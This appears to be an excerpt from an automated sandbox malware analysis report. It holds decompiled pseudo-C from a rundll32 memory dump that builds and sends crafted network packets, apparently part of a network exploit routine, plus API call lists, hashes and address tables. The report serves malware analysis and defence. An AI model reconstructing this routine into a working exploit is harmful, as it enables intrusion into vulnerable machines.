                                                                                                                                                  • API String ID: 4291131564-0
                                                                                                                                                  • Opcode ID: 13077234275fe6dceb892d936ff6ef54869866e79be321e72238ccb26aae3ade
                                                                                                                                                  • Instruction ID: 124ac65a72fe1224f1a4132aa46433af4bed3118b8d8f54cdd4f54694ddcdc35
                                                                                                                                                  • Opcode Fuzzy Hash: 13077234275fe6dceb892d936ff6ef54869866e79be321e72238ccb26aae3ade
                                                                                                                                                  • Instruction Fuzzy Hash: A801FB76600209FFEF118F98DC81EEE7BADEB45794F518025BA0096640E6B1DE119BA0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  APIs
                                                                                                                                                  • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?,?,00000000,?,?,047762E9,?,?,?,?), ref: 04776260
                                                                                                                                                  • CryptHashData.ADVAPI32(?,?,00000021,00000000,?,?,047762E9,?,?,?,?), ref: 04776273
                                                                                                                                                  • CryptGetHashParam.ADVAPI32(?,00000002,00000000,?,00000000,?,?,047762E9,?,?,?,?), ref: 04776289
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CryptHash$CreateDataParam
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3669532303-0
                                                                                                                                                  • Opcode ID: 1c5f42c2308ab93edca94016f50e7f274ea63fdeb0bf6b99322fff8343d1d685
                                                                                                                                                  • Instruction ID: df5d807040fd5a685f56feb650c8793986dab532e7f2f8ee608bc91770dfa34c
                                                                                                                                                  • Opcode Fuzzy Hash: 1c5f42c2308ab93edca94016f50e7f274ea63fdeb0bf6b99322fff8343d1d685
                                                                                                                                                  • Instruction Fuzzy Hash: B7F0D0B5200708BFE7618FA5ED85EAB77BDFB44754B909829F606E6140D771ED04CB20
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 60%
                                                                                                                                                  			E047729A2(intOrPtr _a4, void** _a8, short _a12, intOrPtr* _a16) {
                                                                                                                                                  				void* _v8;
                                                                                                                                                  				signed int _v12;
                                                                                                                                                  				void* _v16;
                                                                                                                                                  				void* _v20;
                                                                                                                                                  				signed int _v24;
                                                                                                                                                  				signed int _v28;
                                                                                                                                                  				signed int _v32;
                                                                                                                                                  				void* _t160;
                                                                                                                                                  				signed int _t166;
                                                                                                                                                  				void* _t172;
                                                                                                                                                  				intOrPtr _t173;
                                                                                                                                                  				short _t174;
                                                                                                                                                  				short _t175;
                                                                                                                                                  				signed int _t179;
                                                                                                                                                  				short _t182;
                                                                                                                                                  				signed int _t183;
                                                                                                                                                  				signed int _t185;
                                                                                                                                                  				intOrPtr _t188;
                                                                                                                                                  				short _t189;
                                                                                                                                                  				void* _t192;
                                                                                                                                                  				void* _t195;
                                                                                                                                                  				void* _t204;
                                                                                                                                                  				short _t207;
                                                                                                                                                  				short _t208;
                                                                                                                                                  				short _t209;
                                                                                                                                                  				void* _t217;
                                                                                                                                                  				short _t223;
                                                                                                                                                  				short _t224;
                                                                                                                                                  				void* _t226;
                                                                                                                                                  				void* _t227;
                                                                                                                                                  				void* _t235;
                                                                                                                                                  				void* _t240;
                                                                                                                                                  				signed int _t241;
                                                                                                                                                  				signed int _t246;
                                                                                                                                                  				signed int _t247;
                                                                                                                                                  				signed int _t252;
                                                                                                                                                  				signed int _t254;
                                                                                                                                                  				intOrPtr _t261;
                                                                                                                                                  				signed int _t262;
                                                                                                                                                  				void* _t264;
                                                                                                                                                  				signed int _t271;
                                                                                                                                                  				void** _t273;
                                                                                                                                                  				signed int _t277;
                                                                                                                                                  				intOrPtr* _t279;
                                                                                                                                                  				intOrPtr _t280;
                                                                                                                                                  				void** _t281;
                                                                                                                                                  				void* _t285;
                                                                                                                                                  				void* _t286;
                                                                                                                                                  				void* _t289;
                                                                                                                                                  				intOrPtr _t293;
                                                                                                                                                  				void* _t297;
                                                                                                                                                  				void* _t300;
                                                                                                                                                  				void* _t302;
                                                                                                                                                  				void* _t304;
                                                                                                                                                  				intOrPtr* _t305;
                                                                                                                                                  				intOrPtr* _t306;
                                                                                                                                                  				void* _t307;
                                                                                                                                                  				void* _t308;
                                                                                                                                                  				void* _t309;
                                                                                                                                                  				void* _t310;
                                                                                                                                                  				void* _t313;
                                                                                                                                                  
                                                                                                                                                  				_v24 = 0xbadf00d;
                                                                                                                                                  				_t160 = HeapAlloc(GetProcessHeap(), 8, 0xffff);
                                                                                                                                                  				_v8 = _t160;
                                                                                                                                                  				if(_t160 == 0) {
                                                                                                                                                  					L30:
                                                                                                                                                  					return _v24;
                                                                                                                                                  				}
                                                                                                                                                  				_t240 = HeapAlloc(GetProcessHeap(), 8, 0x1124);
                                                                                                                                                  				if(_t240 == 0) {
                                                                                                                                                  					L29:
                                                                                                                                                  					HeapFree(GetProcessHeap(), 8, _v8);
                                                                                                                                                  					goto L30;
                                                                                                                                                  				}
                                                                                                                                                  				_t273 = _a8;
                                                                                                                                                  				_t166 = rand();
                                                                                                                                                  				asm("cdq");
                                                                                                                                                  				_t241 = 0x14;
                                                                                                                                                  				 *((intOrPtr*)( *_t273 + 0x22)) =  *((intOrPtr*)( *_t273 + 0x22)) + _t166 % _t241;
                                                                                                                                                  				_t297 =  *_t273;
                                                                                                                                                  				_v28 = ( *(_t297 + 0x22) & 0x0000ff00) - 0x00000100 & 0x0000ffff;
                                                                                                                                                  				_t172 = memcpy(_t240, _t297, 0x100 << 2);
                                                                                                                                                  				_t308 = _t307 + 0xc;
                                                                                                                                                  				__imp__#9(0x50, 9);
                                                                                                                                                  				 *(_t240 + 2) = _t172;
                                                                                                                                                  				_t173 = 4;
                                                                                                                                                  				 *((intOrPtr*)(_t240 + 0x28)) = _t173;
                                                                                                                                                  				 *((intOrPtr*)(_t240 + 0x38)) = _t173;
                                                                                                                                                  				_t174 = 5;
                                                                                                                                                  				 *((short*)(_t240 + 0x49)) = _t174;
                                                                                                                                                  				_t175 = 7;
                                                                                                                                                  				_t277 = 0;
                                                                                                                                                  				 *((short*)(_t240 + 0x4b)) = _t175;
                                                                                                                                                  				 *((char*)(_t240 + 8)) = 0xa0;
                                                                                                                                                  				 *((intOrPtr*)(_t240 + 0x24)) = 0x13;
                                                                                                                                                  				 *(_t240 + 0x2c) = 0x10d0;
                                                                                                                                                  				 *((intOrPtr*)(_t240 + 0x30)) = 0x3f40;
                                                                                                                                                  				 *(_t240 + 0x34) = 0x10d0;
                                                                                                                                                  				 *((intOrPtr*)(_t240 + 0x3c)) = 0x4c;
                                                                                                                                                  				 *(_t240 + 0x40) = 0;
                                                                                                                                                  				 *(_t240 + 0x44) = 0;
                                                                                                                                                  				 *((char*)(_t240 + 0x48)) = 0;
                                                                                                                                                  				 *((short*)(_t240 + 0x50)) = _a12;
                                                                                                                                                  				do {
                                                                                                                                                  					 *((char*)(_t240 + _t277 + 0x54)) = rand();
                                                                                                                                                  					_t277 = _t277 + 1;
                                                                                                                                                  				} while (_t277 < 0x10d0);
                                                                                                                                                  				_v12 = _v12 & 0x00000000;
                                                                                                                                                  				do {
                                                                                                                                                  					_t179 = rand();
                                                                                                                                                  					_t246 = 0x14;
                                                                                                                                                  					asm("cdq");
                                                                                                                                                  					 *((intOrPtr*)( *_a8 + 0x22)) =  *((intOrPtr*)( *_a8 + 0x22)) + _t179 % _t246;
                                                                                                                                                  					_t279 = _a8;
                                                                                                                                                  					_t182 =  *((intOrPtr*)( *_t279 + 0x22));
                                                                                                                                                  					 *((short*)(_t240 + 0x22)) = _t182;
                                                                                                                                                  					__imp__#19(_a4, _t240, 0x54, 0);
                                                                                                                                                  					if(_t182 <= 0) {
                                                                                                                                                  						goto L7;
                                                                                                                                                  					}
                                                                                                                                                  					__imp__#16(_a4, _v8, 0xffff, 0);
                                                                                                                                                  					if(_t182 <= 0) {
                                                                                                                                                  						break;
                                                                                                                                                  					}
                                                                                                                                                  					L7:
                                                                                                                                                  					_v12 = _v12 + 1;
                                                                                                                                                  				} while (_v12 < 4);
                                                                                                                                                  				_t280 =  *_t279;
                                                                                                                                                  				_t183 = rand();
                                                                                                                                                  				asm("cdq");
                                                                                                                                                  				_t247 = 0x14;
                                                                                                                                                  				_t185 = _t183 % _t247 +  *(_t280 + 0x22) & 0x0000ffff;
                                                                                                                                                  				_v32 = _t185;
                                                                                                                                                  				 *(_t280 + 0x22) = _t185;
                                                                                                                                                  				__imp__#9(0x1120);
                                                                                                                                                  				_t281 = _a8;
                                                                                                                                                  				 *(_t240 + 2) = _t185;
                                                                                                                                                  				 *((short*)(_t240 + 0x22)) =  *((intOrPtr*)( *_t281 + 0x22));
                                                                                                                                                  				_t188 = 4;
                                                                                                                                                  				 *((intOrPtr*)(_t240 + 0x28)) = _t188;
                                                                                                                                                  				 *((intOrPtr*)(_t240 + 0x24)) = 0x13;
                                                                                                                                                  				 *(_t240 + 0x2c) = 0x10d0;
                                                                                                                                                  				 *((intOrPtr*)(_t240 + 0x38)) = _t188;
                                                                                                                                                  				_t189 = 5;
                                                                                                                                                  				 *((short*)(_t240 + 0x49)) = _t189;
                                                                                                                                                  				 *((intOrPtr*)(_t240 + 0x30)) =  *((intOrPtr*)( *_a16 + 0x74)) - 0x10d0;
                                                                                                                                                  				 *(_t240 + 0x34) = 0x10d0;
                                                                                                                                                  				 *((intOrPtr*)(_t240 + 0x3c)) = 0x4c;
                                                                                                                                                  				 *(_t240 + 0x40) = 0x10d0;
                                                                                                                                                  				 *(_t240 + 0x44) = 0x50;
                                                                                                                                                  				 *((char*)(_t240 + 0x48)) = 0;
                                                                                                                                                  				 *((short*)(_t240 + 0x4b)) = 0x10d7;
                                                                                                                                                  				_t192 = HeapAlloc(GetProcessHeap(), 8, 0x160);
                                                                                                                                                  				_v20 = _t192;
                                                                                                                                                  				if(_t192 == 0) {
                                                                                                                                                  					L28:
                                                                                                                                                  					HeapFree(GetProcessHeap(), 8, _t240);
                                                                                                                                                  					goto L29;
                                                                                                                                                  				}
                                                                                                                                                  				_t252 = 9;
                                                                                                                                                  				_t195 = memcpy(_t192,  *_t281, _t252 << 2);
                                                                                                                                                  				_t309 = _t308 + 0xc;
                                                                                                                                                  				__imp__#9(0x15c);
                                                                                                                                                  				_t300 = _v20;
                                                                                                                                                  				 *(_t300 + 2) = _t195;
                                                                                                                                                  				 *((intOrPtr*)(_t300 + 0x2c)) = 0x114;
                                                                                                                                                  				 *((intOrPtr*)(_t300 + 0x3c)) = 0x114;
                                                                                                                                                  				 *((char*)(_t300 + 8)) = 0xa1;
                                                                                                                                                  				 *((char*)(_t300 + 0x24)) = 0x12;
                                                                                                                                                  				 *(_t300 + 0x40) = 0x48;
                                                                                                                                                  				 *((short*)(_t300 + 0x49)) = 0x115;
                                                                                                                                                  				_t285 = 0;
                                                                                                                                                  				do {
                                                                                                                                                  					 *((char*)(_t300 + _t285 + 0x4c)) = rand();
                                                                                                                                                  					_t285 = _t285 + 1;
                                                                                                                                                  				} while (_t285 <  *((intOrPtr*)(_t300 + 0x3c)));
                                                                                                                                                  				_t286 = HeapAlloc(GetProcessHeap(), 8, 0x48);
                                                                                                                                                  				_v16 = _t286;
                                                                                                                                                  				if(_t286 == 0) {
                                                                                                                                                  					L27:
                                                                                                                                                  					HeapFree(GetProcessHeap(), 8, _t300);
                                                                                                                                                  					goto L28;
                                                                                                                                                  				}
                                                                                                                                                  				_t254 = 9;
                                                                                                                                                  				_t204 = memcpy(_t286,  *_a8, _t254 << 2);
                                                                                                                                                  				_t310 = _t309 + 0xc;
                                                                                                                                                  				__imp__#9(0x44);
                                                                                                                                                  				_t302 = _v16;
                                                                                                                                                  				 *(_t302 + 2) = _t204;
                                                                                                                                                  				 *((short*)(_t302 + 0x22)) = _v28;
                                                                                                                                                  				 *((short*)(_t302 + 0x25)) = 0x200;
                                                                                                                                                  				 *((char*)(_t302 + 8)) = 0x25;
                                                                                                                                                  				 *((char*)(_t302 + 0x24)) = 0xe;
                                                                                                                                                  				 *(_t302 + 0x31) =  *(_t302 + 0x31) | 0xffffffff;
                                                                                                                                                  				_t207 = 4;
                                                                                                                                                  				 *((short*)(_t302 + 0x37)) = _t207;
                                                                                                                                                  				_t208 = 0x40;
                                                                                                                                                  				 *((short*)(_t302 + 0x39)) = _t208;
                                                                                                                                                  				_t209 = 5;
                                                                                                                                                  				 *((short*)(_t302 + 0x41)) = _t209;
                                                                                                                                                  				 *((short*)(_t302 + 0x27)) =  *((intOrPtr*)( *_a16 + 0x7c)) - 0x200;
                                                                                                                                                  				 *((short*)(_t302 + 0x44)) = _a12;
                                                                                                                                                  				_t289 = HeapAlloc(GetProcessHeap(), 8, 0x1638);
                                                                                                                                                  				_v12 = _t289;
                                                                                                                                                  				if(_t289 == 0) {
                                                                                                                                                  					L26:
                                                                                                                                                  					HeapFree(GetProcessHeap(), 8, _t302);
                                                                                                                                                  					_t300 = _v20;
                                                                                                                                                  					goto L27;
                                                                                                                                                  				}
                                                                                                                                                  				memcpy(_t289, _t240, 0x1124);
                                                                                                                                                  				_t110 = _t289 + 0x1124; // 0x1124
                                                                                                                                                  				_t217 = memcpy(_t110, _v20, 0x160);
                                                                                                                                                  				__imp__#9(0x50);
                                                                                                                                                  				 *(_t240 + 2) = _t217;
                                                                                                                                                  				 *((short*)(_t240 + 0x22)) = _a12;
                                                                                                                                                  				_t261 = 4;
                                                                                                                                                  				 *((intOrPtr*)(_t240 + 0x28)) = _t261;
                                                                                                                                                  				 *((intOrPtr*)(_t240 + 0x24)) = 0x13;
                                                                                                                                                  				 *(_t240 + 0x40) =  *(_t240 + 0x40) & 0x00000000;
                                                                                                                                                  				_t271 =  *((intOrPtr*)( *_a16 + 0x74)) - 0x1000;
                                                                                                                                                  				 *(_t240 + 0x44) =  *(_t240 + 0x44) & 0x00000000;
                                                                                                                                                  				 *((intOrPtr*)(_t240 + 0x30)) = 0x1000;
                                                                                                                                                  				 *(_t240 + 0x34) = _t271;
                                                                                                                                                  				_t223 = 5;
                                                                                                                                                  				 *((short*)(_t240 + 0x49)) = _t223;
                                                                                                                                                  				_t224 = 7;
                                                                                                                                                  				 *((short*)(_t240 + 0x4b)) = _t224;
                                                                                                                                                  				_t126 = _t289 + 0x1284; // 0x1284
                                                                                                                                                  				 *((intOrPtr*)(_t240 + 0x38)) = _t261;
                                                                                                                                                  				_t262 = 0x15;
                                                                                                                                                  				 *(_t240 + 0x2c) = _t271;
                                                                                                                                                  				 *((intOrPtr*)(_t240 + 0x3c)) = 0x4c;
                                                                                                                                                  				 *((char*)(_t240 + 0x48)) = 0;
                                                                                                                                                  				_t226 = memcpy(_t126, _t240, _t262 << 2);
                                                                                                                                                  				_t313 = _t310 + 0x24;
                                                                                                                                                  				_t132 = _t226 + 0x54; // 0x12d8
                                                                                                                                                  				_t304 = _t132;
                                                                                                                                                  				_t293 = 0xc;
                                                                                                                                                  				do {
                                                                                                                                                  					_t227 = _v16;
                                                                                                                                                  					 *((short*)(_t227 + 0x22)) =  *((short*)(_t227 + 0x22)) + 1;
                                                                                                                                                  					memcpy(_t304, _t227, 0x48);
                                                                                                                                                  					_t313 = _t313 + 0xc;
                                                                                                                                                  					_t304 = _t304 + 0x48;
                                                                                                                                                  					_t293 = _t293 - 1;
                                                                                                                                                  				} while (_t293 != 0);
                                                                                                                                                  				_t305 = __imp__#19;
                                                                                                                                                  				_push(_t293);
                                                                                                                                                  				_push(0x111c);
                                                                                                                                                  				_push(_v12);
                                                                                                                                                  				_push(_a4);
                                                                                                                                                  				if( *_t305() <= 0) {
                                                                                                                                                  					L25:
                                                                                                                                                  					HeapFree(GetProcessHeap(), 8, _v12);
                                                                                                                                                  					_t302 = _v16;
                                                                                                                                                  					goto L26;
                                                                                                                                                  				}
                                                                                                                                                  				_push(_t293);
                                                                                                                                                  				_push(0x51c);
                                                                                                                                                  				_push(_v12 + 0x111c);
                                                                                                                                                  				_push(_a4);
                                                                                                                                                  				if( *_t305() <= 0) {
                                                                                                                                                  					goto L25;
                                                                                                                                                  				}
                                                                                                                                                  				_t306 = __imp__#16;
                                                                                                                                                  				_push(_t293);
                                                                                                                                                  				_a12 = _t293;
                                                                                                                                                  				_push(0xffff);
                                                                                                                                                  				_push(_v8);
                                                                                                                                                  				while(1) {
                                                                                                                                                  					_t235 =  *_t306(_a4);
                                                                                                                                                  					if(_t235 <= 0) {
                                                                                                                                                  						break;
                                                                                                                                                  					}
                                                                                                                                                  					_t264 = _v8;
                                                                                                                                                  					_a12 = _a12 + _t235;
                                                                                                                                                  					if( *((intOrPtr*)(_t264 + 9)) != 0) {
                                                                                                                                                  						goto L25;
                                                                                                                                                  					}
                                                                                                                                                  					if(_a12 >= 0x147b) {
                                                                                                                                                  						if(E04772708(_t264, _t264, _t235, _a16) != 0) {
                                                                                                                                                  							_v24 = _v24 & 0x00000000;
                                                                                                                                                  							 *((short*)( *_a8 + 0x22)) = _v32;
                                                                                                                                                  						}
                                                                                                                                                  						goto L25;
                                                                                                                                                  					}
                                                                                                                                                  					_push(0);
                                                                                                                                                  					_push(0xffff);
                                                                                                                                                  					_push(_t264);
                                                                                                                                                  				}
                                                                                                                                                  				goto L25;
                                                                                                                                                  			}
































































                                                                                                                                                  0x047729b8
                                                                                                                                                  0x047729c8
                                                                                                                                                  0x047729ca
                                                                                                                                                  0x047729cf
                                                                                                                                                  0x04772e08
                                                                                                                                                  0x04772e0f
                                                                                                                                                  0x04772e0f
                                                                                                                                                  0x047729e1
                                                                                                                                                  0x047729e5
                                                                                                                                                  0x04772df6
                                                                                                                                                  0x04772e02
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04772e02
                                                                                                                                                  0x047729eb
                                                                                                                                                  0x047729f0
                                                                                                                                                  0x047729f6
                                                                                                                                                  0x047729f9
                                                                                                                                                  0x04772a03
                                                                                                                                                  0x04772a07
                                                                                                                                                  0x04772a20
                                                                                                                                                  0x04772a23
                                                                                                                                                  0x04772a23
                                                                                                                                                  0x04772a25
                                                                                                                                                  0x04772a2d
                                                                                                                                                  0x04772a31
                                                                                                                                                  0x04772a32
                                                                                                                                                  0x04772a35
                                                                                                                                                  0x04772a3a
                                                                                                                                                  0x04772a3b
                                                                                                                                                  0x04772a41
                                                                                                                                                  0x04772a47
                                                                                                                                                  0x04772a49
                                                                                                                                                  0x04772a51
                                                                                                                                                  0x04772a55
                                                                                                                                                  0x04772a5c
                                                                                                                                                  0x04772a5f
                                                                                                                                                  0x04772a66
                                                                                                                                                  0x04772a69
                                                                                                                                                  0x04772a70
                                                                                                                                                  0x04772a73
                                                                                                                                                  0x04772a76
                                                                                                                                                  0x04772a7a
                                                                                                                                                  0x04772a7e
                                                                                                                                                  0x04772a84
                                                                                                                                                  0x04772a88
                                                                                                                                                  0x04772a89
                                                                                                                                                  0x04772a8d
                                                                                                                                                  0x04772a91
                                                                                                                                                  0x04772a96
                                                                                                                                                  0x04772a9e
                                                                                                                                                  0x04772a9f
                                                                                                                                                  0x04772aaa
                                                                                                                                                  0x04772aae
                                                                                                                                                  0x04772ab3
                                                                                                                                                  0x04772ab7
                                                                                                                                                  0x04772abb
                                                                                                                                                  0x04772ac3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04772ad2
                                                                                                                                                  0x04772ada
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04772adc
                                                                                                                                                  0x04772adc
                                                                                                                                                  0x04772adf
                                                                                                                                                  0x04772ae5
                                                                                                                                                  0x04772ae7
                                                                                                                                                  0x04772aef
                                                                                                                                                  0x04772af0
                                                                                                                                                  0x04772afc
                                                                                                                                                  0x04772aff
                                                                                                                                                  0x04772b02
                                                                                                                                                  0x04772b06
                                                                                                                                                  0x04772b0c
                                                                                                                                                  0x04772b14
                                                                                                                                                  0x04772b20
                                                                                                                                                  0x04772b24
                                                                                                                                                  0x04772b25
                                                                                                                                                  0x04772b2a
                                                                                                                                                  0x04772b31
                                                                                                                                                  0x04772b37
                                                                                                                                                  0x04772b3a
                                                                                                                                                  0x04772b3b
                                                                                                                                                  0x04772b4b
                                                                                                                                                  0x04772b4e
                                                                                                                                                  0x04772b51
                                                                                                                                                  0x04772b58
                                                                                                                                                  0x04772b5b
                                                                                                                                                  0x04772b62
                                                                                                                                                  0x04772b66
                                                                                                                                                  0x04772b71
                                                                                                                                                  0x04772b77
                                                                                                                                                  0x04772b7c
                                                                                                                                                  0x04772de6
                                                                                                                                                  0x04772df0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04772df0
                                                                                                                                                  0x04772b86
                                                                                                                                                  0x04772b8e
                                                                                                                                                  0x04772b8e
                                                                                                                                                  0x04772b90
                                                                                                                                                  0x04772b96
                                                                                                                                                  0x04772b99
                                                                                                                                                  0x04772ba2
                                                                                                                                                  0x04772ba5
                                                                                                                                                  0x04772ba9
                                                                                                                                                  0x04772bad
                                                                                                                                                  0x04772bb1
                                                                                                                                                  0x04772bb8
                                                                                                                                                  0x04772bbc
                                                                                                                                                  0x04772bbe
                                                                                                                                                  0x04772bc4
                                                                                                                                                  0x04772bc8
                                                                                                                                                  0x04772bc9
                                                                                                                                                  0x04772bdf
                                                                                                                                                  0x04772be1
                                                                                                                                                  0x04772be6
                                                                                                                                                  0x04772dd6
                                                                                                                                                  0x04772de0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04772de0
                                                                                                                                                  0x04772bf3
                                                                                                                                                  0x04772bf6
                                                                                                                                                  0x04772bf6
                                                                                                                                                  0x04772bf8
                                                                                                                                                  0x04772bfe
                                                                                                                                                  0x04772c01
                                                                                                                                                  0x04772c09
                                                                                                                                                  0x04772c14
                                                                                                                                                  0x04772c1f
                                                                                                                                                  0x04772c23
                                                                                                                                                  0x04772c2b
                                                                                                                                                  0x04772c32
                                                                                                                                                  0x04772c35
                                                                                                                                                  0x04772c39
                                                                                                                                                  0x04772c3c
                                                                                                                                                  0x04772c40
                                                                                                                                                  0x04772c41
                                                                                                                                                  0x04772c4e
                                                                                                                                                  0x04772c54
                                                                                                                                                  0x04772c65
                                                                                                                                                  0x04772c67
                                                                                                                                                  0x04772c6c
                                                                                                                                                  0x04772dc3
                                                                                                                                                  0x04772dcd
                                                                                                                                                  0x04772dd3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04772dd3
                                                                                                                                                  0x04772c79
                                                                                                                                                  0x04772c89
                                                                                                                                                  0x04772c90
                                                                                                                                                  0x04772c9a
                                                                                                                                                  0x04772ca0
                                                                                                                                                  0x04772ca8
                                                                                                                                                  0x04772cb3
                                                                                                                                                  0x04772cb4
                                                                                                                                                  0x04772cb7
                                                                                                                                                  0x04772cc1
                                                                                                                                                  0x04772cca
                                                                                                                                                  0x04772ccc
                                                                                                                                                  0x04772cd0
                                                                                                                                                  0x04772cd7
                                                                                                                                                  0x04772cda
                                                                                                                                                  0x04772cdd
                                                                                                                                                  0x04772ce1
                                                                                                                                                  0x04772ce4
                                                                                                                                                  0x04772ce8
                                                                                                                                                  0x04772cee
                                                                                                                                                  0x04772cf1
                                                                                                                                                  0x04772cf6
                                                                                                                                                  0x04772cf9
                                                                                                                                                  0x04772d00
                                                                                                                                                  0x04772d04
                                                                                                                                                  0x04772d04
                                                                                                                                                  0x04772d08
                                                                                                                                                  0x04772d08
                                                                                                                                                  0x04772d0b
                                                                                                                                                  0x04772d0c
                                                                                                                                                  0x04772d0c
                                                                                                                                                  0x04772d0f
                                                                                                                                                  0x04772d17
                                                                                                                                                  0x04772d1c
                                                                                                                                                  0x04772d1f
                                                                                                                                                  0x04772d22
                                                                                                                                                  0x04772d22
                                                                                                                                                  0x04772d25
                                                                                                                                                  0x04772d2b
                                                                                                                                                  0x04772d2c
                                                                                                                                                  0x04772d31
                                                                                                                                                  0x04772d34
                                                                                                                                                  0x04772d3b
                                                                                                                                                  0x04772dae
                                                                                                                                                  0x04772dba
                                                                                                                                                  0x04772dc0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04772dc0
                                                                                                                                                  0x04772d40
                                                                                                                                                  0x04772d41
                                                                                                                                                  0x04772d4b
                                                                                                                                                  0x04772d4c
                                                                                                                                                  0x04772d53
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04772d55
                                                                                                                                                  0x04772d5b
                                                                                                                                                  0x04772d5c
                                                                                                                                                  0x04772d64
                                                                                                                                                  0x04772d65
                                                                                                                                                  0x04772d83
                                                                                                                                                  0x04772d86
                                                                                                                                                  0x04772d8a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04772d6a
                                                                                                                                                  0x04772d6d
                                                                                                                                                  0x04772d74
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04772d7d
                                                                                                                                                  0x04772d9b
                                                                                                                                                  0x04772da6
                                                                                                                                                  0x04772daa
                                                                                                                                                  0x04772daa
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04772d9b
                                                                                                                                                  0x04772d7f
                                                                                                                                                  0x04772d81
                                                                                                                                                  0x04772d82
                                                                                                                                                  0x04772d82
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,74CB4F20,?,04774775), ref: 047729BF
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,04774775), ref: 047729C8
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00001124,?,04774775), ref: 047729DC
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,04774775), ref: 047729DF
                                                                                                                                                  • rand.MSVCRT ref: 047729F0
                                                                                                                                                  • htons.WS2_32(00000050), ref: 04772A25
                                                                                                                                                  • rand.MSVCRT ref: 04772A7E
                                                                                                                                                  • rand.MSVCRT ref: 04772A96
                                                                                                                                                  • send.WS2_32(00000000,00000000,00000054,00000000), ref: 04772ABB
                                                                                                                                                  • recv.WS2_32(00000000,?,0000FFFF,00000000), ref: 04772AD2
                                                                                                                                                  • rand.MSVCRT ref: 04772AE7
                                                                                                                                                  • htons.WS2_32(00001120), ref: 04772B06
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000160,?,04774775), ref: 04772B6A
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,04774775), ref: 04772B71
                                                                                                                                                  • htons.WS2_32(0000015C), ref: 04772B90
                                                                                                                                                  • rand.MSVCRT ref: 04772BBE
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000048,?,04774775), ref: 04772BD2
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,04774775), ref: 04772BD9
                                                                                                                                                  • htons.WS2_32(00000044), ref: 04772BF8
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00001638,?,04774775), ref: 04772C58
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,04774775), ref: 04772C5F
                                                                                                                                                  • memcpy.MSVCRT ref: 04772C79
                                                                                                                                                  • memcpy.MSVCRT ref: 04772C90
                                                                                                                                                  • htons.WS2_32(00000050), ref: 04772C9A
                                                                                                                                                  • memcpy.MSVCRT ref: 04772D17
                                                                                                                                                  • send.WS2_32(00000004,00000004,0000111C,0000000B), ref: 04772D37
                                                                                                                                                  • send.WS2_32(00000004,-00001118,0000051C,0000000B), ref: 04772D4F
                                                                                                                                                  • recv.WS2_32(00000004,?,0000FFFF,0000000B), ref: 04772D86
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000004,?,?,?,?,?,?,?,?,?,?,04774775), ref: 04772DB3
                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,04774775), ref: 04772DBA
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,04774775), ref: 04772DC6
                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,04774775), ref: 04772DCD
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,04774775), ref: 04772DD9
                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,04774775), ref: 04772DE0
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000,?,04774775), ref: 04772DE9
                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,04774775), ref: 04772DF0
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,04774775), ref: 04772DFB
                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,04774775), ref: 04772E02
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
